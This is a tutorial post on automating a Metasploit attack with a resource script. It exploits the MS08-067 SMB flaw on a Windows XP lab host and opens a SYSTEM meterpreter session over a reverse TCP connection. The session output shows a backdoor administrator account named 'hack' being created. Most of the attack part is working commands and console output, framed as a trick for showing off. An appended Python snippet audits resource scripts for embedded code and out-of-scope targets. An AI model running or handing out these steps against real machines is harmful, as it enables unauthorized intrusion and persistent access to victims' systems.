Metasploit automated attacks: a must-have for showing off

(1) First, run an ordinary exploitation by hand

msf6 > search ms08_067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi                                                                             

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts
                                       file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process,
                                         none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.106
rhosts => 192.168.1.106

msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] 192.168.1.106:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.106:2648) at 2021-06-04 18:01:33 +0800

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms08_067_netapi) > sessions -l -v

Active sessions
===============

  Session ID: 1
        Name: 
        Type: meterpreter windows
        Info: NT AUTHORITY\SYSTEM @ WINXP-1
      Tunnel: 192.168.1.113:4444 -> 192.168.1.106:2648 (192.168.1.106)
         Via: exploit/windows/smb/ms08_067_netapi
   Encrypted: Yes (AES-256-CBC)
        UUID: 82804a20859da4c7/x86=1/windows=1/2021-06-04T10:01:31Z
     CheckIn: 30s ago @ 2021-06-04 18:01:33 +0800
  Registered: No

(2) Write the script

┌──(root💀kali)-[~]
└─# echo use exploit/windows/smb/ms08_067_netapi > auto_exploit_winxp.rc
                                                                                             
┌──(root💀kali)-[~]
└─# echo set rhosts 192.168.1.106 >> auto_exploit_winxp.rc              
                                                                                             
┌──(root💀kali)-[~]
└─# echo set target 34 >> auto_exploit_winxp.rc           
                                                                                             
┌──(root💀kali)-[~]
└─# echo exploit >> auto_exploit_winxp.rc      
                                                                                             
┌──(root💀kali)-[~]
└─# msfconsole
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v6.0.46-dev                          ]
+ -- --=[ 2135 exploits - 1140 auxiliary - 365 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: View advanced module options with 
advanced

msf6 > resource auto_exploit_winxp.rc
[*] Processing /root/auto_exploit_winxp.rc for ERB directives.
resource (/root/auto_exploit_winxp.rc)> use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (/root/auto_exploit_winxp.rc)> set rhosts 192.168.1.106
rhosts => 192.168.1.106
resource (/root/auto_exploit_winxp.rc)> set target 34
target => 34
resource (/root/auto_exploit_winxp.rc)> exploit

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] 192.168.1.106:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.106:2745) at 2021-06-04 18:08:10 +0800

meterpreter > uuid
[+] UUID: f31a23066f90ad37/x86=1/windows=1/2021-06-04T10:08:08Z
meterpreter > get system
[-] Unknown command: get.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > net user
[-] Unknown command: net.
meterpreter > shell
Process 1200 created.
Channel 1 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

\\ 的用户帐户

-------------------------------------------------------------------------------
__wfilterd_user          Administrator            Guest                    
HelpAssistant            st21                     SUPPORT_388945a0         
命令运行完毕，但发生一个或多个错误。


C:\WINDOWS\system32>net user hack hack /add
net user hack hack /add
命令成功完成。


C:\WINDOWS\system32>net user
net user

\\ 的用户帐户

-------------------------------------------------------------------------------
__wfilterd_user          Administrator            Guest                    
hack                     HelpAssistant            st21                     
SUPPORT_388945a0         
命令运行完毕，但发生一个或多个错误。

C:\WINDOWS\system32>net localgroup administrators hack /add
net localgroup administrators hack /add
命令成功完成。

C:\WINDOWS\system32>net user hack
net user hack
用户名                 hack
全名                   
注释                   
用户的注释             
国家(地区)代码         000 (系统默认)
帐户启用               Yes
帐户到期               从不

上次设置密码           2021/6/4 下午 06:08
密码到期               2021/7/17 下午 04:56
密码可更改             2021/6/4 下午 06:08
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           All
登录脚本               
用户配置文件           
主目录                 
上次登录               从不

允许的登录小时数       All

本地组成员             *Administrators       *Users                
全局组成员             *None                 
命令成功完成。

C:\WINDOWS\system32>

At the shell, write the commands into a file with echo, then start msfconsole and run the file with resource <filename>.
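
As an added example (not code from the original post), a small Python audit of a resource script before it is handed to resource: it parses the use/set/exploit lines the way msfconsole walks them, flags embedded Ruby/ERB (the "Processing ... for ERB directives" line above shows it is evaluated on load), and checks that every RHOSTS value stays inside an authorized range. The sample file mirrors auto_exploit_winxp.rc; the 192.168.1.0/24 scope is an assumption.

```python
import ipaddress
# Constructed sample: the same four commands the page echoes into auto_exploit_winxp.rc.
SAMPLE_RC = """\
use exploit/windows/smb/ms08_067_netapi
set rhosts 192.168.1.106
set target 34
exploit
"""
DEFAULT_SCOPE = ("192.168.1.0/24",)  # hypothetical authorized lab range (assumed, not from the page)

def parse_rc(text):
    """Walk an rc file and return one (module, options) plan per exploit/run line."""
    plans, module, opts = [], None, {}
    for raw in text.splitlines():
        words = raw.strip().split()
        if not words or words[0].startswith("#"):
            continue
        cmd = words[0].lower()
        if cmd == "use" and len(words) > 1:
            module, opts = words[1], {}  # a new module starts a fresh option set
        elif cmd in ("set", "setg") and len(words) > 2:
            opts[words[1].upper()] = " ".join(words[2:])  # option names are case-insensitive
        elif cmd in ("exploit", "run"):
            plans.append((module, dict(opts)))
    return plans

def hosts_out_of_scope(rhosts, scope):
    """List RHOSTS tokens (single IPs or CIDRs) that fall outside every allowed network."""
    nets, bad = [ipaddress.ip_network(s) for s in scope], []
    for token in rhosts.split():
        try:
            net = ipaddress.ip_network(token, strict=False)
        except ValueError:
            bad.append(token)  # hostnames and file:<path> lists cannot be checked statically
            continue
        if not any(n.version == net.version and net.subnet_of(n) for n in nets):
            bad.append(token)
    return bad

def audit_rc(text, scope=DEFAULT_SCOPE):
    """Findings to review before handing an rc file to msfconsole's resource command."""
    findings = []
    if "<ruby>" in text or "<%" in text:  # msfconsole evaluates embedded Ruby/ERB on load
        findings.append("embedded Ruby/ERB runs arbitrary code when the file is loaded")
    for module, opts in parse_rc(text):
        if "RHOSTS" not in opts:
            findings.append(f"{module}: no RHOSTS set")
        for host in hosts_out_of_scope(opts.get("RHOSTS", ""), scope):
            findings.append(f"{module}: RHOSTS {host} is outside the authorized scope")
    return findings
```

An empty findings list means the script only touches hosts inside the agreed range and contains no embedded code.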
